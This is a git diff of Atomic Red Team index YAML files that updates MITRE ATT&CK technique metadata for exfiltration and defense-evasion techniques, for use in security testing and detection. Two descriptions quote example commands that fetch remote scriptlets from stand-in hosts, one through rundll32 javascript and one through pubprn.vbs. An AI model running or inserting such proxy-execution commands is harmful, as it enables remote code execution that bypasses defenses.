-      spec_version: '2.1'
     atomic_tests: []
   T1029:
     technique:
@@ -67249,7 +68140,7 @@ exfiltration:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1029
         external_id: T1029
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-28T00:26:48.769Z'
       name: Scheduled Transfer
       description: |-
         Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability.
@@ -67269,8 +68160,6 @@ exfiltration:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Connection Creation'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1011:
     technique:
@@ -67317,7 +68206,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1011.001:
     technique:
@@ -67337,7 +68225,7 @@ exfiltration:
       - source_name: mitre-attack
         external_id: T1011.001
         url: https://attack.mitre.org/techniques/T1011/001
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-08T21:02:15.802Z'
       name: Exfiltration Over Bluetooth
       description: |-
         Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an adversary may opt to exfiltrate data using a Bluetooth communication channel.
@@ -67359,8 +68247,6 @@ exfiltration:
       - 'File: File Access'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1020:
     technique:
@@ -67414,7 +68300,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1020
     atomic_tests: []
   T1048.001:
@@ -67439,7 +68324,7 @@ exfiltration:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-28T00:43:24.228Z'
       name: Exfiltration Over Symmetric Encrypted Non-C2 Protocol
       description: "Adversaries may steal data by exfiltrating it over a symmetrically
         encrypted network protocol other than that of the existing command and control
@@ -67474,12 +68359,10 @@ exfiltration:
       - 'Command: Command Execution'
       - 'File: File Access'
       - 'Network Traffic: Network Connection Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1020.001:
     technique:
-      modified: '2023-04-14T23:23:30.327Z'
+      modified: '2024-10-15T16:08:13.273Z'
       name: Traffic Duplication
       description: |-
         Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised infrastructure. Traffic mirroring is a native feature for some devices, often used for network analysis. For example, devices may be configured to forward network traffic to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring)(Citation: Juniper Traffic Mirroring)
@@ -67504,11 +68387,10 @@ exfiltration:
       x_mitre_platforms:
       - Network
       - IaaS
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Network Traffic: Network Connection Creation'
       - 'Network Traffic: Network Traffic Flow'
-      x_mitre_network_requirements: false
       type: attack-pattern
       id: attack-pattern--7c46b364-8496-4234-8a56-f7e6727e21e1
       created: '2020-10-19T13:40:11.118Z'
@@ -67551,9 +68433,8 @@ exfiltration:
         url: https://www.us-cert.gov/ncas/alerts/TA18-106A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1567.001:
     technique:
@@ -67600,7 +68481,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1048.002:
     technique:
@@ -67626,7 +68506,7 @@ exfiltration:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-15T22:44:11.953Z'
       name: Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric
         Encrypted Non-C2 Protocol
       description: "Adversaries may steal data by exfiltrating it over an asymmetrically
@@ -67659,8 +68539,6 @@ exfiltration:
       - 'File: File Access'
       - 'Network Traffic: Network Connection Creation'
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1048.002
     atomic_tests:
     - name: Exfiltrate data HTTPS using curl freebsd,linux or macos
@@ -67685,7 +68563,7 @@ exfiltration:
           '
   T1041:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-07T17:09:14.040Z'
       name: Exfiltration Over C2 Channel
       description: Adversaries may steal data by exfiltrating it over an existing
         command and control channel. Stolen data is encoded into the normal communications
@@ -67734,12 +68612,11 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1041
     atomic_tests: []
   T1048:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:57:26.415Z'
       name: Exfiltration Over Alternative Protocol
       description: "Adversaries may steal data by exfiltrating it over a different
         protocol than that of the existing command and control channel. The data may
@@ -67775,12 +68652,11 @@ exfiltration:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
       - Network
-      x_mitre_version: '1.4'
+      - Office Suite
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Cloud Storage: Cloud Storage Access'
       - 'Network Traffic: Network Traffic Flow'
@@ -67789,7 +68665,6 @@ exfiltration:
       - 'Application Log: Application Log Content'
       - 'File: File Access'
       - 'Network Traffic: Network Connection Creation'
-      x_mitre_network_requirements: false
       type: attack-pattern
       id: attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776
       created: '2017-05-31T21:30:44.720Z'
@@ -67813,9 +68688,8 @@ exfiltration:
         url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1048
     atomic_tests:
     - name: Exfiltration Over Alternative Protocol - SSH
@@ -67889,7 +68763,7 @@ exfiltration:
       - source_name: mitre-attack
         external_id: T1052.001
         url: https://attack.mitre.org/techniques/T1052/001
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-15T22:48:29.490Z'
       name: Exfiltration over USB
       description: Adversaries may attempt to exfiltrate data over a USB connected
         physical device. In certain circumstances, such as an air-gapped network compromise,
@@ -67911,8 +68785,6 @@ exfiltration:
       - 'Command: Command Execution'
       x_mitre_system_requirements:
       - Presence of physical medium or device
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1567.003:
     technique:
@@ -67963,7 +68835,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1567.003
     atomic_tests: []
   T1567.002:
@@ -68013,7 +68884,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1567.002
     atomic_tests: []
   T1030:
@@ -68038,7 +68908,7 @@ exfiltration:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-07-14T19:47:46.912Z'
       name: Data Transfer Size Limits
       description: An adversary may exfiltrate data in fixed size chunks instead of
         whole files or limit packet sizes below certain thresholds. This approach
@@ -68061,8 +68931,6 @@ exfiltration:
       - 'Network Traffic: Network Connection Creation'
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1030
     atomic_tests:
     - name: Data Transfer Size Limits
@@ -68105,7 +68973,7 @@ exfiltration:
         name: sh
   T1537:
     technique:
-      modified: '2024-04-11T15:53:00.577Z'
+      modified: '2024-10-15T16:08:25.344Z'
       name: Transfer Data to Cloud Account
       description: "Adversaries may exfiltrate data by transferring the data, including
         through sharing/syncing and creating backups of cloud environments, to another
@@ -68146,9 +69014,8 @@ exfiltration:
       x_mitre_platforms:
       - IaaS
       - SaaS
-      - Google Workspace
-      - Office 365
-      x_mitre_version: '1.4'
+      - Office Suite
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Cloud Storage: Cloud Storage Modification'
       - 'Snapshot: Snapshot Creation'
@@ -68196,7 +69063,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1052:
     technique:
@@ -68218,7 +69084,7 @@ exfiltration:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1052
         external_id: T1052
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-15T22:48:29.702Z'
       name: Exfiltration Over Physical Medium
       description: Adversaries may attempt to exfiltrate data via a physical medium,
         such as a removable drive. In certain circumstances, such as an air-gapped
@@ -68242,12 +69108,10 @@ exfiltration:
       x_mitre_system_requirements:
       - Presence of physical medium or device
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1048.003:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-12T23:39:25.476Z'
       name: 'Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated
         Non-C2 Protocol'
       description: "Adversaries may steal data by exfiltrating it over an un-encrypted
@@ -68311,7 +69175,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1048.003
     atomic_tests:
     - name: Exfiltration Over Alternative Protocol - HTTP
diff --git a/atomics/Indexes/office-365-index.yaml b/atomics/Indexes/office-365-index.yaml
index ccb09cb9cb..4884f67596 100644
--- a/atomics/Indexes/office-365-index.yaml
+++ b/atomics/Indexes/office-365-index.yaml
@@ -45,7 +45,7 @@ defense-evasion:
         description: Microsoft. (n.d.). SendNotifyMessage function. Retrieved December
           16, 2017.
         source_name: Microsoft SendNotifyMessage function
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.004Z'
       name: 'Process Injection: Extra Window Memory Injection'
       description: "Adversaries may inject malicious code into process via Extra Window
         Memory (EWM) in order to evade process-based defenses as well as possibly
@@ -97,13 +97,11 @@ defense-evasion:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.011
     atomic_tests: []
   T1205.002:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-20T19:56:18.579Z'
       name: Socket Filters
       description: |-
         Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
@@ -166,21 +164,27 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1027.011:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-10-04T15:05:25.388Z'
       name: Fileless Storage
       description: "Adversaries may store data in \"fileless\" formats to conceal
         malicious activity from defenses. Fileless storage can be broadly defined
         as any format other than a file. Common examples of non-volatile fileless
-        storage include the Windows Registry, event logs, or WMI repository.(Citation:
-        Microsoft Fileless)(Citation: SecureList Fileless)\n\nSimilar to fileless
-        in-memory behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620)
+        storage in Windows systems include the Windows Registry, event logs, or WMI
+        repository.(Citation: Microsoft Fileless)(Citation: SecureList Fileless) In
+        Linux systems, shared memory directories such as `/dev/shm`, `/run/shm`, `/var/run`,
+        and `/var/lock` may also be considered fileless storage, as files written
+        to these directories are mapped directly to RAM and not stored on the disk.(Citation:
+        Elastic Binary Executed from Shared Memory Directory)(Citation: Akami Frog4Shell
+        2024)(Citation: Aquasec Muhstik Malware 2024)\n\nSimilar to fileless in-memory
+        behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620)
         and [Process Injection](https://attack.mitre.org/techniques/T1055), fileless
         data storage may remain undetected by anti-virus and other endpoint security
-        tools that can only access specific file formats from disk storage.\n\nAdversaries
+        tools that can only access specific file formats from disk storage. Leveraging
+        fileless storage may also allow adversaries to bypass the protections offered
+        by read-only file systems in Linux.(Citation: Sysdig Fileless Malware 23022)\n\nAdversaries
         may use fileless storage to conceal various types of stored data, including
         payloads/shellcode (potentially being used as part of [Persistence](https://attack.mitre.org/tactics/TA0003))
         and collected data not yet exfiltrated from the victim (e.g., [Local Data
@@ -200,6 +204,7 @@ defense-evasion:
       - Mark Wee
       - Simona David
       - Xavier Rousseau
+      - Vito Alfano, Group-IB
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -207,10 +212,12 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.0'
+      - Linux
+      x_mitre_version: '2.0'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'WMI: WMI Creation'
+      - 'Process: Process Creation'
       type: attack-pattern
       id: attack-pattern--02c5abff-30bf-4703-ab92-1f6072fae939
       created: '2023-03-23T19:55:25.546Z'
@@ -220,6 +227,14 @@ defense-evasion:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1027/011
         external_id: T1027.011
+      - source_name: Aquasec Muhstik Malware 2024
+        description: " Nitzan Yaakov. (2024, June 4). Muhstik Malware Targets Message
+          Queuing Services Applications. Retrieved September 24, 2024."
+        url: https://www.aquasec.com/blog/muhstik-malware-targets-message-queuing-services-applications/
+      - source_name: Elastic Binary Executed from Shared Memory Directory
+        description: Elastic. (n.d.). Binary Executed from Shared Memory Directory.
+          Retrieved September 24, 2024.
+        url: https://www.elastic.co/guide/en/security/7.17/prebuilt-rule-7-16-3-binary-executed-from-shared-memory-directory.html
       - source_name: SecureList Fileless
         description: Legezo, D. (2022, May 4). A new secret stash for “fileless” malware.
           Retrieved March 23, 2023.
@@ -228,15 +243,22 @@ defense-evasion:
         description: Microsoft. (2023, February 6). Fileless threats. Retrieved March
           23, 2023.
         url: https://learn.microsoft.com/microsoft-365/security/intelligence/fileless-threats
+      - source_name: Sysdig Fileless Malware 23022
+        description: Nicholas Lang. (2022, May 3). Fileless malware mitigation. Retrieved
+          September 24, 2024.
+        url: https://sysdig.com/blog/containers-read-only-fileless-malware/
+      - source_name: Akami Frog4Shell 2024
+        description: Ori David. (2024, February 1). Frog4Shell — FritzFrog Botnet
+          Adds One-Days to Its Arsenal. Retrieved September 24, 2024.
+        url: https://www.akamai.com/blog/security-research/fritzfrog-botnet-new-capabilities-log4shell
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218.011:
     technique:
-      modified: '2023-08-14T15:35:28.965Z'
+      modified: '2024-10-14T13:14:43.083Z'
       name: 'Signed Binary Proxy Execution: Rundll32'
       description: "Adversaries may abuse rundll32.exe to proxy execution of malicious
         code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)),
@@ -247,10 +269,10 @@ defense-evasion:
         also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002)
         Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code>
         and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes
-        rundll32.exe to execute. (Citation: Trend Micro CPL)\n\nRundll32 can also
-        be used to execute scripts such as JavaScript. This can be done using a syntax
-        similar to this: <code>rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication
-        \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"</code>
+        rundll32.exe to execute.(Citation: Trend Micro CPL) For example, [ClickOnce](https://attack.mitre.org/techniques/T1127/002)
+        can be proxied through Rundll32.exe.\n\nRundll32 can also be used to execute
+        scripts such as JavaScript. This can be done using a syntax similar to this:
+        <code>rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"</code>
         \ This behavior has been seen used by malware such as Poweliks. (Citation:
         This is Security Command Line Confusion)\n\nAdversaries may also attempt to
         obscure malicious code from analysis by abusing the manner in which rundll32.exe
@@ -286,7 +308,7 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '2.2'
+      x_mitre_version: '2.3'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Command: Command Execution'
@@ -316,7 +338,7 @@ defense-evasion:
       - source_name: This is Security Command Line Confusion
         description: B. Ancel. (2014, August 20). Poweliks – Command Line Confusion.
           Retrieved March 5, 2018.
-        url: https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/
+        url: https://www.stormshield.com/news/poweliks-command-line-confusion/
       - source_name: Github NoRunDll
         description: gtworek. (2019, December 17). NoRunDll. Retrieved August 23,
           2021.
@@ -327,9 +349,8 @@ defense-evasion:
         url: https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218.011
     atomic_tests: []
   T1027.009:
@@ -419,49 +440,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Scott Knight, @sdotknight, VMware Carbon Black
-      - George Allen, VMware Carbon Black
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
-      type: attack-pattern
-      created: '2020-06-26T04:01:09.648Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.003
-        url: https://attack.mitre.org/techniques/T1556/003
-      - source_name: Apple PAM
-        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
-        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
-          Retrieved June 25, 2020.
-      - source_name: Man Pam_Unix
-        url: https://linux.die.net/man/8/pam_unix
-        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
-          25, 2020.
-      - source_name: Red Hat PAM
-        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
-        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
-          (PAM). Retrieved June 25, 2020.
-      - source_name: PAM Backdoor
-        url: https://github.com/zephrax/linux-pam-backdoor
-        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
-          25, 2020.
-      - source_name: PAM Creds
-        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
-        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
-          PAM backdoors & DNS requests. Retrieved June 26, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-21T16:19:55.082Z'
       name: 'Modify Authentication Process: Pluggable Authentication Modules'
       description: |-
         Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is <code>pam_unix.so</code>, which retrieves, sets, and verifies account authentication information in <code>/etc/passwd</code> and <code>/etc/shadow</code>.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
@@ -476,20 +458,57 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Scott Knight, @sdotknight, VMware Carbon Black
+      - George Allen, VMware Carbon Black
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor PAM configuration and module paths (ex: <code>/etc/pam.d/</code>) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
 
         Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Logon Session: Logon Session Creation'
-      x_mitre_permissions_required:
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+      created: '2020-06-26T04:01:09.648Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/003
+        external_id: T1556.003
+      - source_name: Apple PAM
+        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+          Retrieved June 25, 2020.
+        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+      - source_name: Man Pam_Unix
+        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+          25, 2020.
+        url: https://linux.die.net/man/8/pam_unix
+      - source_name: PAM Creds
+        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+          PAM backdoors & DNS requests. Retrieved June 26, 2020.
+        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+      - source_name: Red Hat PAM
+        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+          (PAM). Retrieved June 25, 2020.
+        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+      - source_name: PAM Backdoor
+        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+          25, 2020.
+        url: https://github.com/zephrax/linux-pam-backdoor
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.003
     atomic_tests: []
   T1578.004:
@@ -518,7 +537,7 @@ defense-evasion:
         url: https://cloud.google.com/compute/docs/disks/restore-and-delete-snapshots
         description: Google. (2019, October 7). Restoring and deleting persistent
           disk snapshots. Retrieved October 8, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-03-08T10:33:02.128Z'
       name: Revert Cloud Instance
       description: |-
         An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.
@@ -545,8 +564,6 @@ defense-evasion:
       - 'Instance: Instance Modification'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1564.012:
     technique:
@@ -588,7 +605,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1222.002:
     technique:
@@ -666,7 +682,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1222.002
     atomic_tests: []
   T1216.001:
@@ -703,7 +718,7 @@ defense-evasion:
         Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second <code>script:</code> parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is <code>pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct</code>. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.
 
         In later versions of Windows (10+), <code>PubPrn.vbs</code> has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to <code>LDAP://</code>, vice the <code>script:</code> moniker which could be used to reference remote code via HTTP(S).
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-18T14:55:35.817Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Signed Script Proxy Execution: Pubprn'
       x_mitre_detection: Monitor script processes, such as `cscript`, and command-line
@@ -722,7 +737,6 @@ defense-evasion:
       - Application Control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1216.001
     atomic_tests: []
   T1574.007:
@@ -812,7 +826,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1006:
     technique:
@@ -870,12 +883,87 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1006
     atomic_tests: []
+  T1666:
+    technique:
+      modified: '2024-09-25T16:15:41.224Z'
+      name: Modify Cloud Resource Hierarchy
+      description: "Adversaries may attempt to modify hierarchical structures in infrastructure-as-a-service
+        (IaaS) environments in order to evade defenses.  \n\nIaaS environments often
+        group resources into a hierarchy, enabling improved resource management and
+        application of policies to relevant groups. Hierarchical structures differ
+        among cloud providers. For example, in AWS environments, multiple accounts
+        can be grouped under a single organization, while in Azure environments, multiple
+        subscriptions can be grouped under a single management group.(Citation: AWS
+        Organizations)(Citation: Microsoft Azure Resources)\n\nAdversaries may add,
+        delete, or otherwise modify resource groups within an IaaS hierarchy. For
+        example, in Azure environments, an adversary who has gained access to a Global
+        Administrator account may create new subscriptions in which to deploy resources.
